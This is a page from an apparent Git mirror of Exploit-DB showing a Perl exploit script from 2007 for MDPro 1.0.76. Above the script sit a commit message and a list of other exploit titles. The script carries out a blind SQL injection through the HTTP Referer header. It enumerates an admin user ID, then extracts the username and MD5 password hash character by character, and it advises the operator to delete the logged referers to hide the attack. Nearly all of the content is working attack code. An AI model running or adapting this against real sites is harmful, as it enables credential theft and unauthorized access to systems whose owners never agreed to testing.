bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/4467.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

264 lines
7.7 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
use strict;
use IO::Socket;
my $app = "MDPro 1.0.76";
my $type = "SQL Injection";
my $author = "undefined1_";
my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0";
$| = 1;
print ":: $app $type - by $author ::\n\n\n";
my $url = shift || usage();
if($url =~ m/^(?:http:\/\/)(.*)/) {
$url = $1;
}
if($url !~ m/^.*\/$/) {
$url .= "/";
}
get_md5s($url);
print "don't forget to delete the referers from the admin interface...\n";
sub get_md5s {
my $url = shift;
$url .= "index.php";
my $admins_only = shift;
my $ps = 0;
my $referer = "Firefox ID=". randstring(20,25);
my $uid_charset = "1234567890";
my $user_charset = "abcdefghijklmnopqrstuvwxyz-_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ][}{+=/\\'\"\@\$#!%^&*()";
my $pass_charset = "afc0123456789abde";
my $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
my $recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: '\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv !~ m/Call to undefined function PN_DBMsgError/m) {
print "magic quotes = on ;-[\n";
return $ps;
}
my $recv;
my $lastuid = 0;
while(1) {
my $uid_length = length("$lastuid");
my $user_length = 1;
my $pass_length = 32;
my $uid = "";
my $user = "";
my $pass = "";
my $O_RLY = 0;
for(my $x = $uid_length; $x <= 8; $x++) {
print "\ruid length = $uid_length";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_group_membership where length(CONCAT(pn_uid))=$x and pn_uid>$lastuid and pn_gid=2 limit 1 order by pn_uid asc)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$uid_length = $x;
$x = 9;
$O_RLY = 1;
}
}
if($O_RLY == 0) { return $ps; }
$O_RLY = 0;
print "\ruid length = $uid_length\n";
for(my $i = 1; $i <= $uid_length; $i++) {
for(my $j = 0; $j < length($uid_charset); $j++) {
my $key = substr($uid_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\ruid = $uid$key";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_group_membership where substring(pn_uid,$i,1)=$hex_key and pn_uid>$lastuid and pn_gid=2 order by pn_uid asc limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$uid .= $key;
$j = length($uid_charset);
}
}
}
print "\ruid = $uid\n";
for(my $x = $user_length; $x <= 25; $x++) {
print "\ruser length = $x";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where length(pn_uname)=$x and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$user_length = $x;
$x = 26;
$O_RLY = 1;
}
}
if($O_RLY == 0) { return $ps; }
$O_RLY = 0;
print "\ruser length = $user_length\n";
for(my $i = 1; $i <= $user_length; $i++) {
for(my $j = 0; $j < length($user_charset); $j++) {
my $key = substr($user_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\ruser = $user$key";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where substring(pn_uname,$i,1)=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$user .= $key;
$j = length($user_charset);
}
}
}
print "\ruser = $user\n";
# pour le pass, faire genre un tolower du char direct dans la sql query
for(my $i = 1; $i <= $pass_length; $i++) {
for(my $j = 0; $j < length($pass_charset); $j++) {
my $key = substr($pass_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\rpassword = $pass$key";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where lower(substring(pn_pass,$i,1))=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$pass .= $key;
$j = length($pass_charset);
}
}
}
print "\rpassword = $pass\n\n";
exit;
}
}
# ======================================================
sub parse_host {
my $url = shift;
if($url =~ m/^([^\/:]+).*\//) {
return $1;
}
return "127.0.0.1";
}
sub parse_port {
my $url = shift;
if($url =~ m/^(?:[^\/:]+):(\d+)\//) {
return $1;
}
return "80";
}
sub parse_page {
my $url = shift;
if($url =~ m/^(?:[^\/]+)(\/.*)/) {
return $1;
}
return "/";
}
sub randstring(\$,\$) {
my $min = shift;
my $max = shift;
my $length = int( (rand(65535)%($max-$min+1))+$min);
my $ret = "";
for(my $i = 0; $i < $length; $i++)
{
my $w = int(rand(3));
if($w == 0)
{
$ret .= chr(97 + int(rand(26)));
}
elsif($w == 1)
{
$ret .= chr(65 + int(rand(26)));
}
else
{
$ret .= chr(48 + int(rand(10)));
}
}
return $ret;
}
sub sendpacket {
my $server = shift;
my $port = shift;
my $data = shift;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
print $sock "$data";
$data = "";
my $resp;
while($resp = <$sock>) { $data .= $resp; }
close($sock);
return $data;
}
sub usage() {
printf "usage: %s <url>\n", $0;
exit;
}
# milw0rm.com [2007-09-29]
Reference in a new issue View git blame Copy permalink